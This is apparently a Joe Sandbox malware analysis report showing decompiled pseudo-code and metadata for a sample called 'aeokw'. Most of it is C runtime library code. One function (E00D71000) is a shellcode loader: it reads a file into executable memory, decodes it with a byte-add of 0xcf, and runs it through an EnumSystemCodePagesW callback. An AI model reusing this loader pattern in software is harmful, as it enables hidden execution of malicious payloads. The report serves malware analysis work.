7925->7848 7927 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7926->7927 7928 d7af89 7927->7928 7929 d7afa5 _memset __shift 7928->7929 7930 d71cc3 __cftoe2_l 58 API calls 7928->7930 7929->7849 7931 d7af9b 7930->7931 7932 d71e89 __cftoe2_l 9 API calls 7931->7932 7932->7929 7937 d7c412 7933->7937 7934 d7c435 7936 d75770 __cftoe2_l 6 API calls 7934->7936 7935 d7c484 7939 d7b7bd __cftoe2_l 58 API calls 7935->7939 7938 d7c163 7936->7938 7937->7935 7940 d7c49d 7937->7940 7941 d7c424 7937->7941 7946 d7b7bd 7938->7946 7939->7941 7943 d7b7bd __cftoe2_l 58 API calls 7940->7943 7941->7934 7945 d7cd59 7941->7945 7942 d71e99 __invoke_watson 8 API calls 7944 d7cd90 7942->7944 7943->7941 7945->7942 7947 d7b7d6 7946->7947 7948 d7b7c8 7946->7948 7949 d71cc3 __cftoe2_l 58 API calls 7947->7949 7948->7947 7952 d7b7ec 7948->7952 7950 d7b7dd 7949->7950 7951 d71e89 __cftoe2_l 9 API calls 7950->7951 7953 d7b7e7 7951->7953 7952->7953 7954 d71cc3 __cftoe2_l 58 API calls 7952->7954 7953->7911 7953->7912 7954->7950 7956 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7955->7956 7957 d7ad60 7956->7957 7958 d7ad6d 7957->7958 7959 d7ad76 7957->7959 7960 d71cc3 __cftoe2_l 58 API calls 7958->7960 7962 d7ad9f __shift 7959->7962 7963 d7ad8b 7959->7963 7961 d7ad72 7960->7961 7965 d71e89 __cftoe2_l 9 API calls 7961->7965 7966 d7b7bd __cftoe2_l 58 API calls 7962->7966 7964 d71cc3 __cftoe2_l 58 API calls 7963->7964 7964->7961 7970 d7ad9a _memmove 7965->7970 7967 d7ae16 7966->7967 7968 d71e99 __invoke_watson 8 API calls 7967->7968 7967->7970 7969 d7ae9d 7968->7969 7971 d7c11f __fltout2 58 API calls 7969->7971 7970->7868 7972 d7aed0 7971->7972 7973 d7aee7 7972->7973 7974 d7aed7 7972->7974 7976 d7aeee 7973->7976 7977 d7aef8 7973->7977 7975 d71cc3 __cftoe2_l 58 API calls 7974->7975 7978 d7aedc 7975->7978 7979 d71cc3 __cftoe2_l 58 API calls 7976->7979 7981 d7bfa7 __fptostr 58 API calls 7977->7981 7980 d71e89 __cftoe2_l 9 API calls 7978->7980 7979->7978 7982 d7aee3 7980->7982 7983 d7af38 7981->7983 7985 d75770 __cftoe2_l 6 API calls 7982->7985 7983->7982 7984 d7ad4d __cftoe2_l 58 API calls 7983->7984 7984->7982 7986 d7af68 7985->7986 7986->7868 7988 d7ae9e __cftoe_l 58 API calls 7987->7988 7989 d7ad48 7988->7989 7989->7887 7479 d71ec9 7480 d71ed1 7479->7480 7481 d74869 __calloc_crt 58 API calls 7480->7481 7482 d71eeb 7481->7482 7483 d71f04 7482->7483 7484 d74869 __calloc_crt 58 API calls 7482->7484 7484->7483 7990 d7b2a9 7993 d7b2c1 7990->7993 7994 d7b2d2 7993->7994 7995 d7b2eb 7993->7995 7999 d79549 7994->7999 8008 d795d7 7995->8008 7998 d7b2bc 8000 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7999->8000 8001 d7956d 8000->8001 8011 d7a184 8001->8011 8006 d75770 __cftoe2_l 6 API calls 8007 d795d3 8006->8007 8007->7998 8023 d794a5 8008->8023 8012 d7a1cc 8011->8012 8018 d7a1dc ___mtold12 8011->8018 8013 d71cc3 __cftoe2_l 58 API calls 8012->8013 8014 d7a1d1 8013->8014 8015 d71e89 __cftoe2_l 9 API calls 8014->8015 8015->8018 8016 d75770 __cftoe2_l 6 API calls 8017 d79585 8016->8017 8019 d796a0 8017->8019 8018->8016 8022 d796f8 8019->8022 8020 d75770 __cftoe2_l 6 API calls 8021 d79592 8020->8021 8021->8006 8022->8020 8024 d74bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8023->8024 8025 d794d2 8024->8025 8026 d7a184 ___strgtold12_l 58 API calls 8025->8026 8027 d794ea 8026->8027 8032 d79c12 8027->8032 8030 d75770 __cftoe2_l 6 API calls 8031 d79545 8030->8031 8031->7998 8035 d79c6a 8032->8035 8033 d75770 __cftoe2_l 6 API calls 8034 d79507 8033->8034 8034->8030 8035->8033

                        Executed Functions

                        Function 00D712B0 Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 d712b0-d712c9 1 d712e6 0->1 2 d712cb-d712d0 0->2 4 d712e8-d712ee 1->4 2->1 3 d712d2-d712d4 2->3 5 d712d6-d712db call d71cc3 3->5 6 d712ef-d712f4 3->6 18 d712e1 call d71e89 5->18 8 d712f6-d71300 6->8 9 d71302-d71306 6->9 8->9 13 d71326-d71335 8->13 10 d71316-d71318 9->10 11 d71308-d71313 call d71530 9->11 10->5 15 d7131a-d71324 10->15 11->10 16 d71337-d7133a 13->16 17 d7133c 13->17 15->5 15->13 20 d71341-d71346 16->20 17->20 18->1 22 d7142f-d71432 20->22 23 d7134c-d71353 20->23 22->4 24 d71355-d7135d 23->24 25 d71394-d71396 23->25 24->25 28 d7135f 24->28 26 d71400-d71401 call d72752 25->26 27 d71398-d7139a 25->27 35 d71406-d7140a 26->35 30 d713be-d713c9 27->30 31 d7139c-d713a4 27->31 32 d71365-d71367 28->32 33 d7145d 28->33 38 d713cd-d713d0 30->38 39 d713cb 30->39 36 d713a6-d713b2 31->36 37 d713b4-d713b8 31->37 40 d7136e-d71373 32->40 41 d71369-d7136b 32->41 34 d71461-d7146a 33->34 34->4 35->34 42 d7140c-d71411 35->42 43 d713ba-d713bc 36->43 37->43 44 d71437-d7143b 38->44 45 d713d2-d713de call d72873 call d72a2a 38->45 39->38 40->44 46 d71379-d71392 call d72897 40->46 41->40 42->44 48 d71413-d71424 42->48 43->38 49 d7144d-d71458 call d71cc3 44->49 50 d7143d-d7144a call d71530 44->50 61 d713e3-d713e8 45->61 58 d713f5-d713fe 46->58 53 d71427-d71429 48->53 49->18 50->49 53->22 53->23 58->53 62 d7146f-d71473 61->62 63 d713ee-d713f1 61->63 62->34 63->33 64 d713f3 63->64 64->58
                        C-Code - Quality: 69%
                        			E00D712B0(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00D71530(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E00D72752(_t98, _t119, _t119); // executed
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00D71530(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00D71CC3())) = 0x22;
												L4:
												E00D71E89();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E00D72873(_t119)); // executed
											_t88 = E00D72A2A(); // executed
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00D72897(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00D71CC3())) = 0x16;
				goto L4;
			}




























                        0x00d712ba
                        0x00d712bd
                        0x00d712c3
                        0x00d712c6
                        0x00d712c9
                        0x00d712e6
                        0x00000000
                        0x00d712e6
                        0x00d712cb
                        0x00d712d0
                        0x00000000
                        0x00000000
                        0x00d712d4
                        0x00d712ef
                        0x00d712f2
                        0x00d712f4
                        0x00d71302
                        0x00d71302
                        0x00d71306
                        0x00d7130e
                        0x00d71313
                        0x00d71313
                        0x00d71316
                        0x00d71318
                        0x00000000
                        0x00d7131a
                        0x00d7131a
                        0x00d71322
                        0x00d71324
                        0x00000000
                        0x00000000
                        0x00d71326
                        0x00d71329
                        0x00d7132c
                        0x00d71333
                        0x00d71335
                        0x00d7133c
                        0x00d71337
                        0x00d71337
                        0x00d71337
                        0x00d71341
                        0x00d71344
                        0x00d71346
                        0x00d7142f
                        0x00000000
                        0x00d7134c
                        0x00d7134c
                        0x00d7134c
                        0x00d71353
                        0x00d71394
                        0x00d71394
                        0x00d71396
                        0x00d71401
                        0x00d71407
                        0x00d7140a
                        0x00d71461
                        0x00000000
                        0x00d71467
                        0x00d7140c
                        0x00d7140f
                        0x00d71411
                        0x00d71437
                        0x00d71437
                        0x00d7143b
                        0x00d71445
                        0x00d7144a
                        0x00d71452
                        0x00d712e1
                        0x00d712e1
                        0x00000000
                        0x00d712e1
                        0x00d71413
                        0x00d71416
                        0x00d71419
                        0x00d7141a
                        0x00d7141d
                        0x00d7141d
                        0x00d7141e
                        0x00d71421
                        0x00d71424
                        0x00000000
                        0x00d71424
                        0x00d71398
                        0x00d7139a
                        0x00d713be
                        0x00d713c3
                        0x00d713c9
                        0x00d713cb
                        0x00d713cb
                        0x00d7139c
                        0x00d7139e
                        0x00d713a4
                        0x00d713b6
                        0x00d713b6
                        0x00d713b6
                        0x00d713b8
                        0x00d713a6
                        0x00d713ab
                        0x00d713ad
                        0x00d713ad
                        0x00d713ba
                        0x00d713ba
                        0x00d713cd
                        0x00d713d0
                        0x00000000
                        0x00d713d2
                        0x00d713d2
                        0x00d713d3
                        0x00d713dd
                        0x00d713de
                        0x00d713e3
                        0x00d713e6
                        0x00d713e8
                        0x00d7146f
                        0x00000000
                        0x00d7146f
                        0x00d713ee
                        0x00d713f1
                        0x00d7145d
                        0x00d7145d
                        0x00d7145d
                        0x00d7145d
                        0x00000000
                        0x00d7145d
                        0x00d713f3
                        0x00d713f3
                        0x00d713f5
                        0x00d713f5
                        0x00d713f8
                        0x00d713fb
                        0x00000000
                        0x00d713fb
                        0x00d713d0
                        0x00d71355
                        0x00d71358
                        0x00d7135b
                        0x00d7135d
                        0x00000000
                        0x00000000
                        0x00d7135f
                        0x00000000
                        0x00000000
                        0x00d71365
                        0x00d71367
                        0x00d71369
                        0x00d7136b
                        0x00d7136b
                        0x00d7136e
                        0x00d71371
                        0x00d71373
                        0x00000000
                        0x00d71379
                        0x00d71380
                        0x00d71385
                        0x00d71388
                        0x00d7138b
                        0x00d7138e
                        0x00d71390
                        0x00000000
                        0x00d71390
                        0x00d71427
                        0x00d71427
                        0x00d71427
                        0x00000000
                        0x00d7134c
                        0x00d71346
                        0x00d71318
                        0x00d712fb
                        0x00d712fe
                        0x00d71300
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00d71300
                        0x00d712d6
                        0x00d712db
                        0x00000000

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                        • String ID:
                        • API String ID: 1559183368-0
                        • Opcode ID: a4e72c1444eba6eca6272083a5f87d55c4e3d997e8b7cd9676b1c48892554378
                        • Instruction ID: 7100eee9444e1edd4926910414a3c15ba6e0780f65ec087109f216d529f89e78
                        • Opcode Fuzzy Hash: a4e72c1444eba6eca6272083a5f87d55c4e3d997e8b7cd9676b1c48892554378
                        • Instruction Fuzzy Hash: C751CE38A006059BDB248FAD88856AEB7B1AF41324F28C729F87D966D1F770DD508B74
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D71000 Relevance: 7.6, APIs: 5, Instructions: 50memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 92%
                        			E00D71000(void* __ecx, void* __eflags, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				intOrPtr _t6;
				void* _t7;
				_Unknown_base(*)()* _t8;
				void* _t14;
				_Unknown_base(*)()* _t15;
				void* _t20;
				void* _t21;
				void* _t22;
				intOrPtr* _t28;

				_push(_t14);
				_t22 = 0; // executed
				_t6 = E00D7113F(_t14, _t20, 0, 0x17d78400); // executed
				 *_t28 = 0xd83000;
				_v8 = _t6;
				_t7 = E00D711D1(_a12, _t21); // executed
				_t8 = VirtualAlloc(0, 0x137a, 0x3000, 0x40); // executed
				_t15 = _t8;
				E00D71475(_t15, 0x137a, 1, _t7); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					E00D71530(_t10, 0xcb, 0x17d78400);
					do {
						 *((char*)(_t15 + _t22)) =  *((char*)(_t15 + _t22)) + 0xcf;
						_t22 = _t22 + 1;
					} while (_t22 < 0x137a);
					EnumSystemCodePagesW(_t15, 0); // executed
				}
				return 0;
			}















                        0x00d71004
                        0x00d7100c
                        0x00d7100e
                        0x00d71013
                        0x00d7101d
                        0x00d71020
                        0x00d71036
                        0x00d71044
                        0x00d71048
                        0x00d7104d
                        0x00d71055
                        0x00d71062
                        0x00d7106a
                        0x00d7106a
                        0x00d7106e
                        0x00d7106f
                        0x00d71076
                        0x00d71076
                        0x00d71082

                        APIs
                        • _malloc.LIBCMT ref: 00D7100E
                          • Part of subcall function 00D7113F: __FF_MSGBANNER.LIBCMT ref: 00D71156
                          • Part of subcall function 00D7113F: __NMSG_WRITE.LIBCMT ref: 00D7115D
                          • Part of subcall function 00D7113F: RtlAllocateHeap.NTDLL(012F0000,00000000,00000001,00000000,00000000,00000000,?,00D748C7,00000000,00000000,00000000,00000000,?,00D744F9,00000018,00D82280), ref: 00D71182
                          • Part of subcall function 00D711D1: __wfsopen.LIBCMT ref: 00D711DC
                        • VirtualAlloc.KERNELBASE(00000000,0000137A,00003000,00000040), ref: 00D71036
                        • __fread_nolock.LIBCMT ref: 00D71048
                        • _memset.LIBCMT ref: 00D71062
                        • EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 00D71076
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: AllocAllocateCodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                        • String ID:
                        • API String ID: 3693343133-0
                        • Opcode ID: ae94b8caabbd11a1100054720cb4d81737bf7c89db1a8a54e05e78771a0cc08d
                        • Instruction ID: c49b18dd87d4ba4bac98c936af6f26b7ddc41a12926152908871bb55bd3dbe6c
                        • Opcode Fuzzy Hash: ae94b8caabbd11a1100054720cb4d81737bf7c89db1a8a54e05e78771a0cc08d
                        • Instruction Fuzzy Hash: 730128B6A043047BE7202B799C4BF9F7F5CDB41768F104A51FA09AB1C2FAF499418274
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D71490 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 89%
                        			E00D71490(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t29;
				void* _t32;

				_push(0xc);
				_push(0xd82170);
				E00D72400(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
					L6:
					_t16 = 0;
				} else {
					_t31 =  *((intOrPtr*)(_t32 + 0x18));
					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
						E00D71F5E(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t19 = E00D712B0( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
						_t29 = _t19;
						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E00D71519(_t31);
						_t16 = _t29;
					} else {
						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
							E00D71530( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
						}
						 *((intOrPtr*)(E00D71CC3())) = 0x16;
						E00D71E89();
						goto L6;
					}
				}
				return E00D72445(_t16);
			}







                        0x00d71490
                        0x00d71492
                        0x00d71497
                        0x00d7149e
                        0x00d714a4
                        0x00d714d7
                        0x00d714d7
                        0x00d714ab
                        0x00d714ab
                        0x00d714b0
                        0x00d714e0
                        0x00d714e6
                        0x00d714f6
                        0x00d714fe
                        0x00d71500
                        0x00d71503
                        0x00d7150a
                        0x00d7150f
                        0x00d714b2
                        0x00d714b6
                        0x00d714bf
                        0x00d714c4
                        0x00d714cc
                        0x00d714d2
                        0x00000000
                        0x00d714d2
                        0x00d714b0
                        0x00d714de

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: __lock_file_memset
                        • String ID:
                        • API String ID: 26237723-0
                        • Opcode ID: e65e210cb1e5fc26190519ed9606a05cc56b75f3a0cfc4224d5a238c380a6770
                        • Instruction ID: 930d64823913591ba2cb30b40f0cf77aa059c6681792f016a38bb6c3d4addd7a
                        • Opcode Fuzzy Hash: e65e210cb1e5fc26190519ed9606a05cc56b75f3a0cfc4224d5a238c380a6770
                        • Instruction Fuzzy Hash: D6017139800208ABCF22AFAD9C0699E7AB1EF90368F14C315F96C56151F7318A21DBB1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D711D1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 102 d711d1-d711e5 call d711e6
                        C-Code - Quality: 25%
                        			E00D711D1(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E00D711E6(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}









                        0x00d711d4
                        0x00d711d6
                        0x00d711d9
                        0x00d711dc
                        0x00d711e5

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: __wfsopen
                        • String ID:
                        • API String ID: 197181222-0
                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction ID: 87e28d9a26eeb6ddf06cfc0e27bb45b0b76cd59676309e570496b52e6bb1e4da
                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction Fuzzy Hash: 3EB0927644420C77CE012AC6EC02A493B29AB40760F808020FF0C1C162A673A66496AA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 00D743CC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00D743CC(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                        0x00d743d1
                        0x00d743e1

                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00D71E2A,?,?,?,00000000), ref: 00D743D1
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00D743DA
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 2685d668f8f15a01c0bff2c28d403f6490e5e608f4d31061c273c7bc20eff011
                        • Instruction ID: b77b0a889ee8e6e213fc85b3394ec33d9f091a02d7b03c09e36335f46bfb7274
                        • Opcode Fuzzy Hash: 2685d668f8f15a01c0bff2c28d403f6490e5e608f4d31061c273c7bc20eff011
                        • Instruction Fuzzy Hash: 63B09235044308ABCB002B91EC0EB483F28EB18656FC004A0FA0D84260AB7254908AA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D7439B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00D7439B(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                        0x00d743a8

                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(?,?,00D73447,00D733FC), ref: 00D743A1
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 3344b3564513e55897b67c1b6b0db9655e024e0758011c4ca03d5251b0129fcb
                        • Instruction ID: 82d9fdd46c0ab32070d8104ef543899fd5559cba8d385d8e8e59a16f1cc450d4
                        • Opcode Fuzzy Hash: 3344b3564513e55897b67c1b6b0db9655e024e0758011c4ca03d5251b0129fcb
                        • Instruction Fuzzy Hash: 64A0123000030CA78A001B41EC094443F1CD6041507800060F80C40120973254504591
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D738A8 Relevance: 12.2, APIs: 8, Instructions: 229COMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E00D738A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				intOrPtr _t129;
				signed int _t133;
				void* _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0xd82260);
				E00D72400(__ebx, __edi, __esi);
				E00D7442F(0xb);
				 *((intOrPtr*)(_t155 - 4)) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E00D74869();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0xd84848 = _t82;
					 *0xd850e4 = _t141;
					while(1) {
						__eflags = _t133 - 0x800 + _t82;
						if(_t133 >= 0x800 + _t82) {
							break;
						}
						 *((short*)(_t133 + 4)) = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						 *((intOrPtr*)(_t133 + 8)) = 0;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
